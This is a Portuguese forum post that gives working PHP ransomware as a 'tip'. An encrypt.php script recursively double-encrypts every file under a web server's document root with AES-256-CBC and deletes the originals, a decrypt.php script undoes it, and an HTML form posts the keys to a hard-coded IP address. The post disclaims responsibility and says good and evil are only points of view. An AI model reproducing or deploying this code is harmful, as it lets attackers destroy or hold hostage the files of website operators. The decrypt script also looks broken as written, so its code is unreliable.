Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Ransomware em php

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica Ransomware em php

    Muitos já devem ter ouvido falar algo sobre ransomware mas poucos sabem seu funcionamento. Aqui vai uma dica no caso um pequeno ransoware em PHP:

    1° Criptografando:

    <?php
    function encrypt_decrypt($action, $string, $secret_key, $secret_iv) { //Credits to some website which isn't up right now
    $output = false;
    $encrypt_method = "AES-256-CBC";
    $key = hash('sha256', $secret_key);

    $iv = substr(hash('sha256', $secret_iv), 0, 16);
    if( $action == 'encrypt' ) {
    return base64_encode(openssl_encrypt($string, $encrypt_method, $key, 0, $iv));
    }
    else if( $action == 'decrypt' ){
    return openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
    }
    }
    function encfile($filename){
    if (strpos($filename, '.aes.aes') !== false) {
    return;
    }
    file_put_contents($filename.".aes.aes", (encrypt_decrypt('encrypt', (encrypt_decrypt('encrypt', file_get_contents($filename), $_POST['key1'], $_POST['iv'])), $_POST['key2'], $_POST['iv'])));
    unlink($filename);
    }
    function encdir($dir){
    $files = array_diff(scandir($dir), array('.', '..'));
    foreach($files as $file) {
    if(is_dir($dir."/".$file)){
    encdir($dir."/".$file);
    }else {
    encfile($dir."/".$file);
    }
    }
    }
    if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
    encdir($_SERVER['DOCUMENT_ROOT']);
    }
    ?>

    salve esse codigo como encrypt.php

    2° Desencriptando

    <?php
    function encrypt_decrypt($action, $string, $secret_key, $secret_iv) {//Credits to some website which isn't up right now
    $output = false;
    $encrypt_method = "AES-256-CBC";
    $key = hash('sha256', $secret_key);

    $iv = substr(hash('sha256', $secret_iv), 0, 16);
    if( $action == 'encrypt' ) {
    $output = openssl_encrypt($string, $encrypt_method, $key, 0, $iv);
    $output = base64_encode($output);
    }
    else if( $action == 'decrypt' ){
    $output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
    }
    return $output;
    }
    function decfile($filename){
    if (strpos($filename, '.aes.aes') === FALSE) {
    return;
    }
    $encrypted2 = file_get_contents($filename);
    $encrypted = encrypt_decrypt('decrypt', $encrypted2, $key2, $iv);
    $decrypted = encrypt_decrypt('decrypt', $encrypted, $key1, $iv);
    file_put_contents(substr($filename, 0, -8), $decrypted);
    unlink($filename);
    }
    function decdir($dir){
    $files = array_diff(scandir($dir), array('.', '..'));
    foreach($files as $file) {
    if(is_dir($dir."/".$file)){
    decdir($dir."/".$file);
    }else {
    decfile($dir."/".$file);
    }
    }
    }
    $key1 = $_POST['key1'];
    $key2 = $_POST['key2'];
    $iv = $_POST['iv'];
    if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
    decdir($_SERVER['DOCUMENT_ROOT']);
    echo "Webroot Decrypted";
    }
    ?>

    salve esse código como decrypt.php

    3° criando a "tela"

    <html>
    <body>

    <form method=POST action="http://45.32.119.24/main2.php">
    Key 1:<br>
    <input type="text" name="key1" value="YouAesKey1">
    <br>
    Key 2:<br>
    <input type="text" name="key2" value="YourAesKey2">
    <br>
    IV:<br>
    <input type="text" name="iv" value="YourIV">
    <br><br>
    <input type="submit" value="Submit">
    </form>

    </body>
    </html>

    salve como invoker.html

    Aviso: eu não me responsabilizo por seus atos
    O bem e o mal não existem, existe os pontos de vista
    Similar Threads
X
Working...
X